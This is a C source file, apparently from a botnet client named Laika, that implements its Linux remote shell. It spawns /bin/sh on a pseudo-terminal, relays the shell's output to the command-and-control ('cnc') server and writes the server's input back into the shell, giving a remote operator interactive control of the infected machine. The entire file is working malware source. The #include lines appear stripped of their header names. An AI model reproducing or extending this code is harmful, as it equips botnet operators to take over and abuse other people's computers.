/* platform specific code for opening shells in linux */ #include #include #include #include #include #include #include "lerror.h" #include "lmem.h" #include "ltask.h" #include "bot.h" #include "shell.h" struct sLaika_shell { int pid; int fd; }; struct sLaika_shell *laikaB_newShell(struct sLaika_bot *bot, int cols, int rows) { struct winsize ws; struct sLaika_shell *shell = (struct sLaika_shell*)laikaM_malloc(sizeof(struct sLaika_shell)); ws.ws_col = cols; ws.ws_row = rows; shell->pid = forkpty(&shell->fd, NULL, NULL, &ws); if (shell->pid == 0) { /* child process, clone & run shell */ execlp("/bin/sh", "sh", (char*) NULL); exit(0); } /* make sure our calls to read() & write() do not block */ if (fcntl(shell->fd, F_SETFL, (fcntl(shell->fd, F_GETFL, 0) | O_NONBLOCK)) != 0) { laikaB_freeShell(bot, shell); LAIKA_ERROR("Failed to set shell fd O_NONBLOCK"); } /* start shell task */ bot->shellTask = laikaT_newTask(&bot->tService, LAIKA_SHELL_TASK_DELTA, laikaB_shellTask, (void*)bot); return shell; } void laikaB_freeShell(struct sLaika_bot *bot, struct sLaika_shell *shell) { /* kill the shell */ kill(shell->pid, SIGTERM); close(shell->fd); bot->shell = NULL; laikaM_free(shell); /* stop shell task */ laikaT_delTask(&bot->tService, bot->shellTask); bot->shellTask = NULL; } bool laikaB_readShell(struct sLaika_bot *bot, struct sLaika_shell *shell) { char readBuf[LAIKA_SHELL_DATA_MAX_LENGTH]; struct sLaika_peer *peer = bot->peer; struct sLaika_socket *sock = &peer->sock; int rd = read(shell->fd, readBuf, LAIKA_SHELL_DATA_MAX_LENGTH); if (rd > 0) { /* we read some input! send to cnc */ laikaS_startVarPacket(peer, LAIKAPKT_SHELL_DATA); laikaS_write(sock, readBuf, rd); laikaS_endVarPacket(peer); } else if (rd == -1) { if (LN_ERRNO == LN_EWOULD || LN_ERRNO == EAGAIN) return true; /* recoverable, there was no data to read */ /* not EWOULD or EAGAIN, must be an error! so close the shell */ /* tell cnc shell is closed */ laikaS_emptyOutPacket(peer, LAIKAPKT_SHELL_CLOSE); /* kill shell */ laikaB_freeShell(bot, shell); return false; } return true; } bool laikaB_writeShell(struct sLaika_bot *bot, struct sLaika_shell *shell, char *buf, size_t length) { struct sLaika_peer *peer = bot->peer; struct sLaika_socket *sock = &peer->sock; size_t nLeft; int nWritten; nLeft = length; while (nLeft > 0) { if ((nWritten = write(shell->fd, buf, nLeft)) < 0) { /* some error occurred */ if (length == nLeft) { /* unrecoverable error */ /* tell cnc shell is closed */ laikaS_emptyOutPacket(peer, LAIKAPKT_SHELL_CLOSE); /* kill shell */ laikaB_freeShell(bot, shell); return false; } else { /* recoverable */ break; } } else if (nWritten == 0) { break; } nLeft -= nWritten; buf += nWritten; } return true; }